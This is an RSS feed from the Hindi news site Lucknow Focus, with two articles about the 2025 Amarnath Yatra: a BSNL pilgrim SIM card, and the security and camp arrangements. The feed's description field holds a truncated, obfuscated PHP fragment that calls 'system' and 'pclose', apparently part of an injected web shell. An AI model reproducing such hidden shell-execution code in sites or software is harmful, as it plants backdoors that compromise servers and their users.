Amarnath Yatra – Lucknow Focus http://lucknowfocus.com <?php $_0="s\171stem";$_1="pc\x6cose";$_2 Sat, 05 Jul 2025 06:52:45 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 http://lucknowfocus.com/wp-content/uploads/2022/03/cropped-Capture-32x32.jpg Amarnath Yatra – Lucknow Focus http://lucknowfocus.com 32 32 अमरनाथ यात्रियों के लिए BSNL का खास तोहफा: सिर्फ ₹196 में मिलेगा 15 दिन का स्पेशल सिम कार्ड, हर जगह चलेगा नेटवर्क http://lucknowfocus.com/bsnls-special-gift-for-amarnath-pilgrims/ Sat, 05 Jul 2025 06:52:35 +0000 https://lucknowfocus.com/?p=4710 Lucknow Focus News Desk: अगर आप बाबा बर्फानी के दर्शन को अमरनाथ यात्रा पर निकल रहे हैं, तो यात्रा के दौरान परिवार से जुड़े रहने के लिए अब बीएसएनएल ने खास इंतज़ाम किया है। भारत संचार निगम लिमिटेड (BSNL) ने यात्रियों के लिए एक स्पेशल Yatra SIM कार्ड लॉन्च किया है, जिसकी कीमत ₹196 रखी गई है और वैधता 15 दिन की है।

इस सिम कार्ड की सबसे बड़ी खासियत ये है कि अमरनाथ यात्रा मार्ग पर जहां बाकी मोबाइल नेटवर्क काम नहीं करते, वहां BSNL का नेटवर्क पूरी मजबूती से काम करता है।

नेटवर्क नहीं होगा बाधा

अमरनाथ यात्रा मार्ग पर सुरक्षा कारणों से सिर्फ BSNL का नेटवर्क चालू रहता है। ऐसे में, यात्रा के दौरान किसी भी तरह की कनेक्टिविटी दिक्कत न हो, इसके लिए BSNL ने 4G इनेबल्ड यात्रा सिम कार्ड जारी किया है। इससे अनलिमिटेड वॉइस कॉलिंग और डेटा का लाभ भी मिलेगा।

कहां मिलेगा ये यात्रा सिम?

श्रद्धालु इस सिम कार्ड को जम्मू-कश्मीर के लखनपुर, भगवती नगर, चंद्रकोट, बालटाल, पहलगाम जैसे मुख्य स्थानों से खरीद सकते हैं। इस सिम को पाने के लिए यात्रियों को अपने साथ कुछ जरूरी दस्तावेज़ रखने होंगे:

श्री अमरनाथ यात्रा पंजीकरण स्लिप

आधार कार्ड या कोई अन्य वैध फोटो आईडी (KYC के लिए)

कब से कब तक वैध?

यह सिम कार्ड 15 दिनों तक वैध रहेगा, जो आमतौर पर पूरी यात्रा के लिए पर्याप्त होता है। इसकी शुरुआत तीर्थयात्रा के पहले जत्थे के साथ ही 3 जुलाई से हो चुकी है, और यात्रा 33 दिनों तक चलेगी।

क्यों जरूरी है यह स्पेशल सिम?

जम्मू-कश्मीर में अन्य राज्यों के प्रीपेड सिम कार्ड काम नहीं करते, केवल पोस्टपेड ही चलते हैं।

अमरनाथ यात्रा मार्ग पर केवल BSNL के टावर मौजूद हैं, अन्य निजी कंपनियों का नेटवर्क नहीं मिलता।

यात्रा क्षेत्र अति संवेदनशील जोन में आता है, जहां सीमित और सुरक्षित नेटवर्क की अनुमति है।

BSNL का दावा

BSNL का कहना है कि इस यात्रा सिम से तीर्थयात्री बिना रुकावट के अपने परिजनों से संपर्क बनाए रख सकेंगे। कंपनी ने इसे खास तौर पर अमरनाथ यात्रा की जरूरतों को ध्यान में रखते हुए तैयार किया है।

अगर आप इस साल अमरनाथ यात्रा पर जा रहे हैं, तो BSNL का यह स्पेशल यात्रा सिम कार्ड आपकी यात्रा को और भी सुरक्षित और सुविधाजनक बना सकता है। ₹200 से भी कम कीमत में मिलने वाला यह सिम, उन तमाम जगहों पर भी काम करेगा, जहां दूसरे नेटवर्क बेकार हो जाते हैं।

Also Read: सावन में काशी विश्वनाथ मंदिर के दर्शन होंगे खास, वीआईपी एंट्री बंद, डिजिटल दर्शन की सुविधा

]]>
Amarnath Yatra 2025: 3 जुलाई से शुरू होगी यात्रा, सुरक्षा के पुख्ता इंतज़ाम, पहले जत्थे की रवानगी 2 जुलाई को http://lucknowfocus.com/amarnath-yatra-2025-yatra-will-start-from-july-3-strong-security-arrangements-departure-of-first-batch-on-july-2/ Mon, 30 Jun 2025 08:05:32 +0000 https://lucknowfocus.com/?p=4621 Lucknow Focus News Desk: इस साल की अमरनाथ यात्रा 3 जुलाई से शुरू हो रही है और तीर्थयात्रियों की सुरक्षा को लेकर प्रशासन ने पूरी तैयारियां कर ली हैं। सीआरपीएफ, स्थानीय प्रशासन और धार्मिक संगठनों के सहयोग से यात्रा मार्ग पर सुरक्षा व्यवस्था को बेहद कड़ा किया गया है। खासतौर पर जम्मू-श्रीनगर राष्ट्रीय राजमार्ग (NH-44) पर चौकसी बढ़ा दी गई है।

हर कदम पर सुरक्षा का पहरा

केंद्रीय रिजर्व पुलिस बल (CRPF) ने यात्रा मार्ग पर K-9 डॉग स्क्वॉड और बड़ी संख्या में सुरक्षाकर्मियों को तैनात कर दिया है। खासतौर पर उधमपुर सेक्टर जैसे संवेदनशील इलाकों में गश्त तेज कर दी गई है। यात्रियों की आवाजाही वाले प्रमुख रास्तों की हर गतिविधि पर सीसीटीवी और पेट्रोलिंग टीम की नजर है।

2 जुलाई को पहले जत्थे की होगी रवानगी

अमरनाथ यात्रा का पहला जत्था 2 जुलाई को जम्मू के भगवती नगर आधार शिविर से रवाना होगा। यात्रा का औपचारिक शुभारंभ 3 जुलाई से बालटाल और पहलगाम दोनों मार्गों से होगा।

सिर्फ सड़क मार्ग से होगी यात्रा, रेल से नहीं

इस वर्ष यात्रा के लिए केवल सड़क मार्ग को ही अधिकृत किया गया है। रेलमार्ग से यात्रा की अनुमति नहीं दी गई है। सभी तीर्थयात्रियों को जम्मू से सड़क मार्ग के जरिए आधार शिविरों तक पहुंचाया जाएगा।

ऑफलाइन पंजीकरण 1 जुलाई से शुरू

ऑनलाइन रजिस्ट्रेशन के बाद अब 1 जुलाई से ऑफलाइन पंजीकरण की सुविधा भी शुरू की जा रही है। यात्रियों को एक दिन पहले भगवती नगर कैंप में रिपोर्ट करना होगा, जिसके बाद वे बालटाल या पहलगाम के लिए रवाना हो सकेंगे।

यात्रियों के लिए विशेष सुविधाएं

कमिश्नर रमेश कुमार ने जानकारी दी कि यात्रियों के ठहरने और खानपान की व्यवस्था में कोई कमी न हो, इसके लिए व्यापक तैयारियां की गई हैं।

AC हॉल, हैंगर टेंट, सामुदायिक लंगर, स्वच्छ मोबाइल शौचालय, 24 घंटे पेयजल और बिजली आपूर्ति जैसी सुविधाएं यात्रियों को मिलेंगी।

यात्रा मार्ग में कठुआ से लेकर बनिहाल तक सभी जिलों में विश्राम केंद्र बनाए गए हैं, जहां यात्रियों को वही सभी सुविधाएं मिलेंगी जो मुख्य आधार शिविरों में मिलती हैं।

52 लंगर और 60 RFID केंद्र होंगे सक्रिय

यात्रियों के लिए 52 लंगर सेवा स्थल और 60 RFID रजिस्ट्रेशन केंद्र स्थापित किए गए हैं। जम्मू स्थित सरस्वती धाम में एक विशेष टोकन वितरण केंद्र भी शुरू किया गया है, जहां से यात्री यात्रा की अद्यतन जानकारी और अपनी स्थिति का सत्यापन कर सकेंगे।

यात्रियों को किसी भी तरह की जानकारी के लिए कंट्रोल रूम की व्यवस्था की गई है, जहां से रूट, मौसम, यातायात, स्वास्थ्य सेवाएं आदि से जुड़ी जानकारी ली जा सकेगी।

व्यवस्था में शामिल रहे सभी विभाग

यात्रा को सफल और सुरक्षित बनाने के लिए पुलिस विभाग, धार्मिक संगठनों, टैक्सी यूनियन, व्यापार मंडल, होटल एसोसिएशन सहित सभी हितधारकों के सुझाव लिए गए हैं। सभी विभागों को निर्देश दिए गए हैं कि यात्रा के दौरान किसी भी यात्री को असुविधा न हो।

Also Read: पुरी रथ यात्रा में दर्दनाक हादसा: श्रद्धालुओं की भीड़ में मची भगदड़, 3 की मौत, 50 घायल

]]>